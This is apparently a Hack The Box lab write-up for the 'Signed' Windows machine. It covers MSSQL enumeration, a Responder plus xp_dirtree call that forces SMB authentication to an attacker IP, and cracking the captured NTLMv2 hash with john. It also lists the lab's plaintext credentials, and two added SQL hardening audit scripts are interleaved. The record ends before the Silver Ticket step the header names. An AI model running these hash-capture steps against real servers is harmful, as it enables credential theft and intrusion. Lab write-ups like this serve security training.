Hack The Box: Signed Machine Write-up.

Machine Information

  • Name: Signed
  • Difficulty: Medium
  • OS: Windows
  • IP: 10.10.11.90
  • Key Focus: MSSQL exploitation, Kerberos Silver Ticket forging, privilege escalation

Initial Credentials

Username: scott
Password: Sm230#C5NatH

Reconnaissance

Nmap Scan

nmap -p 1-65535 -T4 -A -v 10.10.11.90

Results:

  • Port 1433/tcp open - Microsoft SQL Server 2022 16.00.1000.00 RTM
  • Domain: SIGNED.HTB
  • Computer Name: DC01.SIGNED.HTB
  • NetBIOS Domain: SIGNED

Host File Update

echo "10.10.11.90 DC01.SIGNED.HTB SIGNED.HTB" >> /etc/hosts

MSSQL Enumeration

Initial Connection

impacket-mssqlclient signed.htb/scott:'Sm230#C5NatH'@10.10.11.90

Check xp_cmdshell Status

enable_xp_cmdshell

Result: Failed - insufficient privileges with scott account

Enumerate Users

enum_users

Findings:

  • dbo mapped to sa login as db_owner
  • guest has no mapped login (scott is mapped to guest with minimal privileges)

Verify xp_dirtree Permissions

SELECT OBJECT_ID('master..xp_dirtree') AS objid
SELECT HAS_PERMS_BY_NAME('master..xp_dirtree','OBJECT','EXECUTE') AS can_execute_xp_dirtree

Result: Execution permissions confirmed (value = 1)
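The two findings above (scott connects through guest, and guest still holds EXECUTE on xp_dirtree) are the root cause of the hash capture that follows, so here is an added hardening audit, written for this write-up and not part of the original post or of any tool used in it. Run it in master as a sysadmin from sqlcmd or SSMS (the GO separators are for those clients); it lists every principal holding EXECUTE on the three extended procedures that accept a UNC path, reports in which databases guest holds CONNECT, and ends with the revoke statements, left commented so the audit can be reviewed before anything is changed. All object names are real SQL Server catalog views and procedures; nothing else is assumed.

```sql
USE master;
GO

-- 1. Who can execute the UNC-path extended procedures? SQL Server grants
--    EXECUTE on these to public by default, which is exactly what let a
--    guest-mapped login force the service account to authenticate outbound.
SELECT  OBJECT_NAME(pe.major_id) AS procedure_name,
        pr.name                  AS grantee,
        pr.type_desc             AS grantee_type,
        pe.permission_name,
        pe.state_desc
FROM    sys.database_permissions pe
JOIN    sys.database_principals pr ON pr.principal_id = pe.grantee_principal_id
WHERE   pe.class_desc = 'OBJECT_OR_COLUMN'
  AND   pe.major_id IN (OBJECT_ID('master..xp_dirtree'),
                        OBJECT_ID('master..xp_fileexist'),
                        OBJECT_ID('master..xp_subdirs'))
ORDER BY procedure_name, grantee;
GO

-- 2. In which databases does guest hold CONNECT? It cannot be revoked in
--    master, msdb and tempdb, but it should be revoked in every user database.
--    One result set is returned per online database.
DECLARE @sql nvarchar(max) = N'';
SELECT @sql += N'SELECT N''' + REPLACE(name, '''', '''''') + N''' AS database_name,'
             + N' p.state_desc, p.permission_name'
             + N' FROM ' + QUOTENAME(name) + N'.sys.database_permissions AS p'
             + N' JOIN ' + QUOTENAME(name) + N'.sys.database_principals AS u'
             + N'   ON u.principal_id = p.grantee_principal_id'
             + N' WHERE u.name = N''guest'' AND p.permission_name = N''CONNECT'';'
             + CHAR(10)
FROM    sys.databases
WHERE   state_desc = 'ONLINE';
EXEC sys.sp_executesql @sql;
GO

-- 3. Remediation (commented out; review the output above first).
--    Sysadmins keep implicit access to the procedures, so anything that
--    legitimately needs them can be granted EXECUTE explicitly afterwards.
-- REVOKE EXECUTE ON OBJECT::dbo.xp_dirtree   FROM public;
-- REVOKE EXECUTE ON OBJECT::dbo.xp_fileexist FROM public;
-- REVOKE EXECUTE ON OBJECT::dbo.xp_subdirs   FROM public;
-- REVOKE CONNECT FROM guest;   -- run inside each user database that lists guest above
```

The outbound SMB authentication these procedures trigger is performed by the SQL Server service account, which is why the captured hash belonged to mssqlsvc rather than to scott. Revoking the public grants closes the trigger; running the service under a group managed service account (whose password is random and rotated automatically) is what stops a captured hash from being cracked offline with a wordlist.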

Hash Capture via Forced SMB Authentication

Start Responder

responder -I tun0

Trigger SMB Authentication

xp_dirtree \\10.10.16.xx\share

Captured Hash

mssqlsvc::SIGNED:...[NTLMv2 hash]...

Crack the Hash

john --wordlist=/usr/share/wordlists/rockyou.txt mssqlsvc.hash

Password Retrieved: purPLE9795!@

Elevated MSSQL Access

Connect as mssqlsvc

mssqlclient.py 'signed.htb/mssqlsvc:purPLE9795!@@10.10.11.90' -windows-auth

Check sysadmin Role Members

SELECT r.name AS role, m.name AS member 
FROM sys.server_principals r 
JOIN sys.server_role_members rm ON r.principal_id=rm.role_principal_id 
JOIN sys.server_principals m ON rm.member_principal_id=m.principal_id 
WHERE r.name='sysadmin';

Key Finding: SIGNED\IT group has sysadmin privileges
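A Windows group in sysadmin means every current and future member of that AD group is a SQL Server administrator, and the query above does not distinguish groups from individual logins. Here is an added audit script for that review, written for this write-up and not part of the original post or of any tool used in it. Run in master from sqlcmd or SSMS (the GO separators are for those clients), it lists all fixed server role members with their principal type, sysadmin first, checks whether the instance-level settings that turn a sysadmin into command execution are enabled, and ends with the remediation statements, commented out. The only page-specific value used is the SIGNED\IT group name from the finding above; everything else is standard SQL Server catalog objects.

```sql
USE master;
GO

-- 1. Fixed server role membership with the principal type, so that Windows
--    groups (WINDOWS_GROUP) stand out from individual logins. Disabled logins
--    and creation dates help spot forgotten or recently added members.
SELECT  r.name       AS server_role,
        m.name       AS member,
        m.type_desc  AS member_type,   -- WINDOWS_GROUP / WINDOWS_LOGIN / SQL_LOGIN
        m.is_disabled,
        m.create_date
FROM    sys.server_role_members rm
JOIN    sys.server_principals r ON r.principal_id = rm.role_principal_id
JOIN    sys.server_principals m ON m.principal_id = rm.member_principal_id
WHERE   r.is_fixed_role = 1
ORDER BY CASE WHEN r.name = 'sysadmin' THEN 0 ELSE 1 END,
         r.name, m.type_desc, m.name;
GO

-- 2. Instance settings that let a sysadmin run OS commands or load code.
--    value_in_use = 1 means the feature is currently enabled.
SELECT  name, value_in_use
FROM    sys.configurations
WHERE   name IN ('xp_cmdshell', 'Ole Automation Procedures', 'clr enabled');
GO

-- 3. Remediation (commented out; confirm with the owners of the group first).
--    Replace the blanket sysadmin grant with the specific permissions the
--    IT team actually needs, and keep xp_cmdshell off unless a job requires it.
-- ALTER SERVER ROLE sysadmin DROP MEMBER [SIGNED\IT];
-- EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
-- EXEC sp_configure 'xp_cmdshell', 0;           RECONFIGURE;
```

Membership changes in sysadmin and flips of the xp_cmdshell setting are both worth alerting on; a SQL Server Audit specification covering the SERVER_ROLE_MEMBER_CHANGE_GROUP and SERVER_OPERATION_GROUP action groups records them, and the second query above is the quick manual check when no audit is in place.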